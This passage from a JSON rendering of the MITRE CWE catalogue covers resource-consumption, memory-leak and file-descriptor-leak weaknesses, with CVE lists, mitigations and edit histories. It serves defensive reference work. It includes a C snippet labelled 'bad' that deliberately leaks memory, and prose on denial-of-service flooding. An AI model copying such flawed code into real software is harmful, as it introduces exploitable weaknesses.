counter++);t.start();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}},"xhtml:br":["",""]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public static final int SERVER_PORT = 4444;public static final int MAX_CONNECTIONS = 10;...public void acceptConnections() {}","xhtml:br":["","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {} catch (IOException ex) {...}","xhtml:div":{"#text":"ServerSocket serverSocket = new ServerSocket(SERVER_PORT);int counter = 0;boolean hasConnections = true;while (hasConnections) {}serverSocket.close();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"hasConnections = checkForMoreConnections();Socket client = serverSocket.accept();Thread t = new Thread(new ClientSocketThread(client));t.setName(client.getInetAddress().getHostName() + \\":\\" + counter++);ExecutorService pool = Executors.newFixedThreadPool(MAX_CONNECTIONS);pool.execute(t);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]}},"xhtml:br":["",""]}}}}],"Body_Text":["In this example there is no limit to the number of client connections and client threads that are created. Allowing an unlimited number of client connections and threads could potentially overwhelm the system and system resources.","The server should limit the number of client connections and the client threads that are created. This can be easily done by creating a thread pool object that limits the number of threads that are generated."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-2874","Description":"Product allows attackers to cause a crash via a large number of connections.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2874"},{"Reference":"CVE-2009-1928","Description":"Malformed request triggers uncontrolled recursion, leading to stack exhaustion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1928"},{"Reference":"CVE-2009-2858","Description":"Chain: memory leak (CWE-404) leads to resource exhaustion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2858"},{"Reference":"CVE-2009-2726","Description":"Driver does not use a maximum width when invoking sscanf style functions, causing stack consumption.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2726"},{"Reference":"CVE-2009-2540","Description":"Large integer value for a length property in an object causes a large amount of memory allocation.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2540"},{"Reference":"CVE-2009-2299","Description":"Web application firewall consumes excessive memory when an HTTP request contains a large Content-Length value but no POST data.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2299"},{"Reference":"CVE-2009-2054","Description":"Product allows exhaustion of file descriptors when processing a large number of TCP packets.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2054"},{"Reference":"CVE-2008-5180","Description":"Communication product allows memory consumption with a large number of SIP requests, which cause many sessions to be created.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5180"},{"Reference":"CVE-2008-2121","Description":"TCP implementation allows attackers to consume CPU and prevent new connections using a TCP SYN flood attack.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2121"},{"Reference":"CVE-2008-2122","Description":"Port scan triggers CPU consumption with processes that attempt to read data from closed sockets.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2122"},{"Reference":"CVE-2008-1700","Description":"Product allows attackers to cause a denial of service via a large number of directives, each of which opens a separate window.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1700"},{"Reference":"CVE-2007-4103","Description":"Product allows resource exhaustion via a large number of calls that do not complete a 3-way handshake.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4103"},{"Reference":"CVE-2006-1173","Description":"Mail server does not properly handle deeply nested multipart MIME messages, leading to stack exhaustion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1173"},{"Reference":"CVE-2007-0897","Description":"Chain: anti-virus product encounters a malformed file but returns from a function without closing a file descriptor (CWE-775) leading to file descriptor consumption (CWE-400) and failed scans.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0897"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Resource exhaustion (file descriptor, disk space, sockets, ...)"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A9","Entry_Name":"Denial of Service","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":10,"Entry_Name":"Denial of Service"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":41,"Entry_Name":"XML Attribute Blowup"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SER12-J","Entry_Name":"Avoid memory and resource leaks during serialization"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MSC05-J","Entry_Name":"Do not exhaust heap space"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP13","Entry_Name":"Unrestricted Consumption"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"147"}},{"attr":{"@_CAPEC_ID":"197"}},{"attr":{"@_CAPEC_ID":"492"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-386"}},{"attr":{"@_External_Reference_ID":"REF-387"}},{"attr":{"@_External_Reference_ID":"REF-388"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 17, &#34;Protecting Against Denial of Service Attacks&#34; Page 517"}}]},"Notes":{"Note":[{"#text":"\\"Resource consumption\\" could be interpreted as a consequence instead of an insecure behavior, so this entry is being considered for modification.  It appears to be referenced too frequently when more precise mappings are available.  Some of its children, such as CWE-771, might be better considered as a chain.","attr":{"@_Type":"Maintenance"}},{"#text":"Vulnerability theory is largely about how behaviors and resources interact. \\"Resource exhaustion\\" can be regarded as either a consequence or an attack, depending on the perspective. This entry is an attempt to reflect the underlying weaknesses that enable these attacks (or consequences) to take place.","attr":{"@_Type":"Theoretical"}},{"attr":{"@_Type":"Other"},"xhtml:p":["Database queries that take a long time to process are good DoS targets. An attacker would have to write a few lines of Perl code to generate enough traffic to exceed the site\'s ability to keep up. This would effectively prevent authorized users from using the site at all. Resources can be exploited simply by ensuring that the target machine must do much more work and consume more resources in order to service a request than the attacker must do to initiate a request.","A prime example of this can be found in old switches that were vulnerable to \\"macof\\" attacks (so named for a tool developed by Dugsong). These attacks flooded a switch with random IP and MAC address combinations, therefore exhausting the switch\'s cache, which held the information of which port corresponded to which MAC addresses. Once this cache was exhausted, the switch would fail in an insecure way and would begin to act simply as a hub, broadcasting all traffic on all ports and allowing for basic sniffing attacks."]}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Detection_Factors, Likelihood_of_Exploit, Observed_Examples, Other_Notes, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Detection_Factors, Potential_Mitigations, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Likelihood_of_Exploit, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Alternate_Terms, Description, Name, Relationships, Taxonomy_Mappings, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Description, Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Resource Exhaustion","attr":{"@_Date":"2008-10-14"}},{"#text":"Uncontrolled Resource Consumption (aka \'Resource Exhaustion\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Uncontrolled Resource Consumption (\'Resource Exhaustion\')","attr":{"@_Date":"2019-01-03"}}]}},"401":{"attr":{"@_ID":"401","@_Name":"Missing Release of Memory after Effective Lifetime","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not sufficiently track and release allocated memory after it has been used, which slowly consumes remaining memory.","Extended_Description":"This is often triggered by improper handling of malformed data or unexpectedly interrupted sessions.  In some languages, developers are responsible for tracking memory allocation and releasing the memory.  If there are no more pointers or references to the memory, then it can no longer be tracked and identified for release.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"772","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1305","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Alternate_Terms":{"Alternate_Term":{"Term":"Memory Leak"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":{"xhtml:p":"Memory leaks have two common and sometimes overlapping causes:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Error conditions and other exceptional circumstances","Confusion over which part of the program is responsible for freeing the memory"]}}}}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":["DoS: Crash, Exit, or Restart","DoS: Instability","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)"],"Note":"Most memory leaks result in general software reliability problems, but if an attacker can intentionally trigger a memory leak, the attacker might be able to launch a denial of service attack (by crashing or hanging the program) or take advantage of other unexpected program behavior resulting from a low memory condition."},{"Scope":"Other","Impact":"Reduce Performance"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-41"},"Phase":"Implementation","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Choose a language or tool that provides automatic memory management, or makes manual memory management less error-prone.","For example, glibc in Linux provides protection against free of invalid pointers.","When using Xcode to target OS X or iOS, enable automatic reference counting (ARC) [REF-391].","To help correctly and consistently manage memory when programming in C++, consider using a smart pointer class such as std::auto_ptr (defined by ISO/IEC ISO/IEC 14882:2003), std::shared_ptr and std::unique_ptr (specified by an upcoming revision of the C++ standard, informally referred to as C++ 1x), or equivalent solutions such as Boost."]}},{"Phase":"Architecture and Design","Description":"Use an abstraction library to abstract away risky APIs. Not a complete solution."},{"Phase":["Architecture and Design","Build and Compilation"],"Description":"The Boehm-Demers-Weiser Garbage Collector or valgrind can be used to detect leaks in code.","Effectiveness_Notes":"This is not a complete solution as it is not 100% effective."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following C function leaks a block of allocated memory if the call to read() does not return the expected number of bytes:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char* getBlock(int fd) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char* buf = (char*) malloc(BLOCK_SIZE);if (!buf) {}if (read(fd, buf, BLOCK_SIZE) != BLOCK_SIZE) {}return buf;","xhtml:br":["","",""],"xhtml:div":[{"#text":"return NULL;","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"return NULL;","xhtml:br":""}}]}}}}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-3119","Description":"Memory leak because function does not free() an element of a data structure.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3119"},{"Reference":"CVE-2004-0427","Description":"Memory leak when counter variable is not decremented.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0427"},{"Reference":"CVE-2002-0574","Description":"chain: reference count is not decremented, leading to memory leak in OS by sending ICMP packets.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0574"},{"Reference":"CVE-2005-3181","Description":"Kernel uses wrong function to release a data structure, preventing data from being properly tracked by other code.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3181"},{"Reference":"CVE-2004-0222","Description":"Memory leak via unknown manipulations as part of protocol test suite.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0222"},{"Reference":"CVE-2001-0136","Description":"Memory leak via a series of the same command.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0136"}]},"Functional_Areas":{"Functional_Area":"Memory Management"},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Memory leak"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Memory Leak"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure to deallocate data"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A9","Entry_Name":"Denial of Service","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM31-C","Entry_Name":"Free dynamically allocated memory when no longer needed","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MSC04-J","Entry_Name":"Do not leak memory"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP38","Entry_Name":"Failure to Release Memory"},{"attr":{"@_Taxonomy_Name":"OMG ASCPEM"},"Entry_ID":"ASCPEM-PRF-14"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-390"}},{"attr":{"@_External_Reference_ID":"REF-391"}},{"attr":{"@_External_Reference_ID":"REF-959","@_Section":"ASCPEM-PRF-14"}}]},"Notes":{"Note":[{"#text":"This is often a resultant weakness due to improper handling of malformed data or early termination of sessions.","attr":{"@_Type":"Relationship"}},{"#text":"\\"memory leak\\" has sometimes been used to describe other kinds of issues, e.g. for information leaks in which the contents of memory are inadvertently leaked (CVE-2003-0400 is one such example of this terminology conflict).","attr":{"@_Type":"Terminology"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, References, Relationship_Notes, Taxonomy_Mappings, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Comment":"Improved the White_Box_Definition"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Modes_of_Introduction, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Alternate_Terms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Name, References, Relationships, Taxonomy_Mappings, Type, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Memory Leak","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Release Memory Before Removing Last Reference (aka \'Memory Leak\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Failure to Release Memory Before Removing Last Reference (\'Memory Leak\')","attr":{"@_Date":"2010-12-13"}},{"#text":"Improper Release of Memory Before Removing Last Reference (\'Memory Leak\')","attr":{"@_Date":"2019-01-03"}},{"#text":"Improper Release of Memory Before Removing Last Reference","attr":{"@_Date":"2019-06-20"}}]}},"402":{"attr":{"@_ID":"402","@_Name":"Transmission of Private Resources into a New Sphere (\'Resource Leak\')","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software makes resources available to untrusted parties when those resources are only intended to be accessed by the software.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Resource Leak"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Resource leaks"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Alternate_Terms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Resource Leaks","attr":{"@_Date":"2008-04-11"}},{"#text":"Transmission of Private Resources into a New Sphere (aka \'Resource Leak\')","attr":{"@_Date":"2009-05-27"}}]}},"403":{"attr":{"@_ID":"403","@_Name":"Exposure of File Descriptor to Unintended Control Sphere (\'File Descriptor Leak\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A process does not close sensitive file descriptors before invoking a child process, which allows the child to perform unauthorized I/O operations using those descriptors.","Extended_Description":"When a new process is forked or executed, the child process inherits any open file descriptors. When the child process has fewer privileges than the parent process, this might introduce a vulnerability if the child process can access the file descriptor but does not have the privileges to access the associated file.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"402","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"Unix","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"File descriptor leak","Description":"While this issue is frequently called a file descriptor leak, the \\"leak\\" term is often used in two different ways - exposure of a resource, or consumption of a resource. Use of this term could cause confusion."}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2003-0740","Description":"Server leaks a privileged file descriptor, allowing the server to be hijacked.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0740"},{"Reference":"CVE-2004-1033","Description":"File descriptor leak allows read of restricted files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1033"},{"Reference":"CVE-2000-0094","Description":"Access to restricted resource using modified file descriptor for stderr.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0094"},{"Reference":"CVE-2002-0638","Description":"Open file descriptor used as alternate channel in complex race condition.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0638"},{"Reference":"CVE-2003-0489","Description":"Program does not fully drop privileges after creating a file descriptor, which allows access to the descriptor via a separate vulnerability.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0489"},{"Reference":"CVE-2003-0937","Description":"User bypasses restrictions by obtaining a file descriptor then calling setuid program, which does not close the descriptor.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0937"},{"Reference":"CVE-2004-2215","Description":"Terminal manager does not properly close file descriptors, allowing attackers to access terminals of other users.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2215"},{"Reference":"CVE-2006-5397","Description":"Module opens a file for reading twice, allowing attackers to read files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5397"}]},"Affected_Resources":{"Affected_Resource":["System Process","File or Directory"]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"UNIX file descriptor leak"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO42-C","Entry_Name":"Ensure files are properly closed when they are no longer needed"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-392"}},{"attr":{"@_External_Reference_ID":"REF-393","@_Section":"Elevating Privileges Safely"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Affected_Resources, Observed_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Alternate_Terms, Description, Name, Observed_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Applicable_Platforms, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated 